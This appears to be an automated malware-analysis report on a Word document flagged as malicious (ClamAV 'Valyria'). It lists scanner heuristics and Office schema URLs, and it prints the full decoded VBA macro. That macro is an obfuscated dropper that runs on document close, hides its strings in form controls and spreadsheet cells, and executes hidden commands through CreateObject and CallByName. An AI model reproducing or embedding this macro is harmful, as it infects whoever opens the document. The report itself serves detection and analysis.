MALICIOUS
222
Risk Score
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-10033904-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set tcm = CreateObject(UserForm1.ComboBox1) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
xa = CallByName(Application, jx9z, 2) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8499 bytes |
SHA-256: 2f674b414aa20c83d98b77e4431908924599658d8e278fdb6eb9145adb5ea076 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public igm, trl, q5, gqnef, rc
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim tcm
vgof = Application.Options.AutoFormatAsYouTypeApplyHeadings
If nt > 762 Then
akesl = Application.Options.CursorMovement
nt = akesl
nt = Application.Options.ShowDiacritics
If lgm2 > 1979 Then
cvq7g = Application.Options.AutoFormatReplaceHyperlinks
lgm2 = cvq7g
End If
End If
Set tcm = CreateObject(UserForm1.ComboBox1)
tcm.DisplayAlerts = False
jx9z = "visible"
eb = "OnTime"
Dim g45
wzmdm = 1
tdo = 1
While wzmdm <> 0 And tdo < 3
Set g45 = tcm.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
wzmdm = Err.Number
tdo = tdo + 1
Wend
If wzmdm <> 0 Then
xa = CallByName(Application, jx9z, 2)
If xa = True Then
zr = Application.Options.ApplyFarEastFontsToAscii
If vgof > 2786 Then
f7 = Application.Options.ShowReadabilityStatistics
vgof = f7
End If
Set p2um8 = CreateObject(UserForm1.ComboBox3)
p2um8.Documents.Open ActiveDocument.FullName, ReadOnly:=True
p2um8.Run "ThisDocument.nnn"
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
tcm.Quit
Exit Sub
End If
Dim fy3
Set fy3 = tcm.sheets(1)
uzg = "'"
ej = tcm.sheets(3).Cells(255, 37).Value
trl = tcm.sheets(2).Cells(158, 49).Value
igm = fy3.Cells(228, 36).Value
j1dn = tcm.sheets(2).Cells(204, 12).Value
sz = tcm.sheets(3).Cells(109, 47).Value
ul2 = Application.Options.ShowFormatError
If zr > 934 Then
fbww = Application.Options.IgnoreInternetAndFileAddresses
zr = fbww
End If
pk = Application.Options.CursorMovement
If ul2 > 1832 Then
zo = Application.Options.ButtonFieldClicks
ul2 = zo
End If
zvetl = Application.CentimetersToPoints(97)
tl = tcm.sheets(3).Cells(189, 27).Value
oh = tcm.sheets(2).Cells(65, 13).Value
vl = tcm.sheets(3).Cells(102, 36).Value
koch = tcm.sheets(1).Cells(92, 29).Value
td = tcm.sheets(2).Cells(21, 2).Value
ta68v = tcm.sheets(1).Cells(167, 7).Value
gck = tcm.sheets(3).Cells(148, 34).Value
dv = Application.Options.AllowCombinedAuxiliaryForms
zg = tcm.sheets(2).Cells(54, 10).Value
h20 = tcm.sheets(3).Cells(26, 1).Value
h42w = Application.Options.MatchFuzzyTC
If dv > 1073 Then
z3 = Application.Options.AllowCompoundNounProcessing
dv = z3
End If
lwo = tcm.sheets(3).Cells(149, 47).Value
p8 = tcm.sheets(3).Cells(223, 34).Value
hn46k = fy3.Cells(158, 27).Value
bf = tcm.sheets(2).Cells(165, 8).Value
g4w8 = tcm.sheets(1).Cells(40, 37).Value
va = tcm.sheets(3).Cells(122, 49).Value
sb4w = tcm.sheets(1).Cells(114, 21).Value
p4v = tcm.sheets(2).Cells(125, 33).Value
rc = fy3.Cells(119, 3).Value
k9g = tcm.sheets(1).Cells(251, 29).Value
pl = Application.Options.SavePropertiesPrompt
If h42w > 3731 Then
ze6 = Application.Options.SnapToShapes
h42w = ze6
End If
kf5w = Application.Options.AutoFormatReplaceOrdinals
If pl > 4118 Then
hs = Application.Options.AutoWordSelection
pl = hs
End If
raq = tcm.sheets(2).Cells(140, 11).Value
dg3f = tcm.sheets(1).Cells(212, 13).Value
kfhr = CallByName(tcm, ej, 2)
Set ev7q = UserForm1.Controls.Add("Forms.ComboBox.1")
ev7q.Value = oh & kfhr & va
Set i32 = UserForm1.Controls.Add("Forms.ComboBox.1")
i32.Value = raq
rz = Application.Options.DefaultTrayID
If kf5w > 439 Then
fm = Application.Options.InterpretHighAnsi
kf5w = fm
End If
CallByName CreateObject(ta68v), zg, 1, ev7q, sz, i32
Set c2u = CreateObject(p4v)
fkk0 = Application.Options.StoreRSIDOnSave
Set e5 = CallByName(c2u, lwo, 2)
Set v7 = CallByName(e5, sb4w, 1)
Set bf = CallByName(c2u, bf, 2)
Set gqnef = c2u
Set j1dn = CallByName(bf, j1dn, 2)
Set koch = CallByName(j1dn, koch, 2)
Set lgm2 = CallByName(koch, dg3f, 1, g4w8)
Set igm = CallByName(lgm2, igm, 2)
h20 = CallByName(igm, h20, 2)
CallByName igm, gck, 1, 1, h20
Set q5 = UserForm1.Controls.Add("Forms.ComboBox.1")
q5.Value = tl & hn46k
UserForm3.ComboBox1 = td
zy6 = Application.Options.AutoFormatReplacePlainTextEmphasis
pd = Application.Options.MatchFuzzyAY
If zy6 > 3886 Then
b8 = Application.Options.MeasurementUnit
zy6 = b8
End If
gfus = Application.Options.DefaultBorderLineStyle
If pd > 2064 Then
g6 = Application.Options.DisableFeaturesIntroducedAfterbyDefault
pd = g6
End If
q5.Value = k9g
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = h20
c2u = Nothing
g45 = Nothing
fy3 = Nothing
h4ik = Application.Options.EnableMisusedWordsDictionary
If gfus > 561 Then
obc2 = Application.Options.ShowDiacritics
gfus = obc2
End If
ns = Application.Options.PictureWrapType
If h4ik > 2792 Then
sn398 = Application.Options.GridDistanceHorizontal
h4ik = sn398
End If
e5 = Nothing
v7 = Nothing
bv1g = Application.Options.UpdateLinksAtOpen
If ns > 270 Then
dq = Application.Options.AutoFormatApplyFirstIndents
ns = dq
End If
bf = Nothing
j1dn = Nothing
koch = Nothing
lgm2 = Nothing
igm = Nothing
ktak = Application.Options.MatchFuzzyZJ
If bv1g > 2334 Then
ugj = Application.Options.Pagination
bv1g = ugj
End If
gqnef = Nothing
egkw = Application.Options.AutoFormatAsYouTypeApplyDates
If ktak > 306 Then
ddpc2 = Application.Options.UseGermanSpellingReform
ktak = ddpc2
End If
DoEvents
CallByName tcm, vl, 1
tcm = Nothing
DoEvents
CallByName CreateObject(ta68v), p8, 1, oh & kfhr & va
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{DA80DBBA-3439-4291-868B-CC0EE5925740}{48987118-6E32-40EE-A906-681F1B765345}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{335DB42C-0D1E-4237-928F-8F5FD863D4A2}{78CE41EA-3C78-4963-89F2-FA312A2BFB07}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
On Error GoTo ErrorHandler
dx = UserForm2.Controls.Count - 1
If Len(UserForm1.ComboBox4) > 10 Then
dx = dx * 2
End If
bb = ""
For xr = 1 To dx Step 2
bb = bb & UserForm2.Controls.Item(xr)
Next
ComboBox1.AddItem "ek"
ComboBox1.AddItem "zo"
ComboBox1.AddItem bb
ComboBox1.AddItem "x9se1"
ly8b4 = Application.Options.DisableFeaturesIntroducedAfterbyDefault
If xr > 1268 Then
j6 = Application.Options.StrictFinalYaa
xr = j6
End If
o9 = Application.Options.SmartParaSelection
If ly8b4 > 4176 Then
h5sy = Application.Options.SaveInterval
ly8b4 = h5sy
End If
Exit Sub
xy = Application.Options.MatchFuzzyBV
If o9 > 1034 Then
slc5g = Application.Options.PasteAdjustTableFormatting
o9 = slc5g
End If
ErrorHandler:
so = Application.Options.AutoFormatReplaceFarEastDashes
If xy > 2060 Then
wgha4 = Application.Options.DefaultBorderColorIndex
xy = wgha4
End If
ii = Application.Options.RTFInClipboard
If so > 4151 Then
nc = Application.Options.AddHebDoubleQuote
so = nc
End If
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{28A33F87-65DF-4D7D-BAA5-8B68F1445670}{C2A291CB-FC1E-429F-A84B-58F3B870CBE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.igm, ActiveDocument.trl, VbMethod, ActiveDocument.q5
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C3B0F944-5E73-4AF4-AE7A-F086AFBDD659}{0ED11120-939E-492B-849B-B6E258E83617}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.gqnef, ActiveDocument.rc, VbMethod, ActiveDocument.q5
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 43008 bytes |
SHA-256: e676cce80f15042864e9276c7de6f57fe42856dcf4365ba88162ef29299435fb |
|||
|
Detection
ClamAV:
Doc.Malware.Valyria-10033904-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.